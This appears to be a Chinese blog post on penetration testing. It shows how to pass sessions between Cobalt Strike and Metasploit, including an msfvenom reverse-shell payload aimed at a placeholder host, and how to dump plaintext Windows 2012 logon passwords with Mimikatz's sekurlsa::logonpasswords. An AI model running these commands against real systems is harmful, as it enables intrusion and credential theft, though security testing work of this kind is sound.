cs与msf权限传递

问题:cs与msf权限传递,以及mimikatz抓取win2012明文密码。

一、CS与MSF权限传递

CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,它们都支持在渗透过程中传递权限。以下是两者之间传递权限的一般步骤:

从Metasploit向Cobalt Strike传递会话
1. 在Metasploit中获取会话:使用Metasploit渗透目标系统并获得会话。
2. 启动Metasploit RPC服务:在Metasploit控制台中启动RPC服务,以便Cobalt Strike可以与Metasploit通信。

   load msgrpc ServerHost=127.0.0.1 Pass=yourpassword


3. 配置Cobalt Strike:在Cobalt Strike中配置Metasploit RPC设置,使其能够连接到Metasploit的RPC服务。

 metasploit_rpc_login("127.0.0.1", 55553, "yourpassword")


4. 传递会话:在Cobalt Strike中使用`metasploit_import`命令导入Metasploit会话。

从Cobalt Strike向Metasploit传递会话 


1. 在Cobalt Strike中获取会话:使用Cobalt Strike渗透目标系统并获得会话。
2. 生成Payload:在Metasploit中生成一个Payload,用于接收Cobalt Strike的会话。

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f exe > payload.exe


3. 在Cobalt Strike中执行Payload:将生成的Payload上传到目标系统并执行,以便Metasploit接收到会话。
4. 接收会话:在Metasploit中配置并监听相应的端口,以接收传递过来的会话。

二、 使用Mimikatz抓取Windows 2012明文密码

Mimikatz是一款强大的工具,用于从Windows系统中提取明文密码、哈希、PIN码等。以下是使用Mimikatz抓取Windows 2012明文密码的步骤:

1. 下载并解压Mimikatz:从GitHub上下载Mimikatz工具,并解压到本地。
2. 以管理员身份运行命令提示符:打开命令提示符,并以管理员身份运行。
3. 执行Mimikatz:导航到Mimikatz所在目录,并启动Mimikatz。

   cd path\to\mimikatz
   mimikatz.exe


4.启用调试特权:在Mimikatz控制台中启用调试特权。

   privilege::debug


5. 抓取明文密码:使用以下命令来抓取明文密码。
 

   sekurlsa::logonpasswords

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值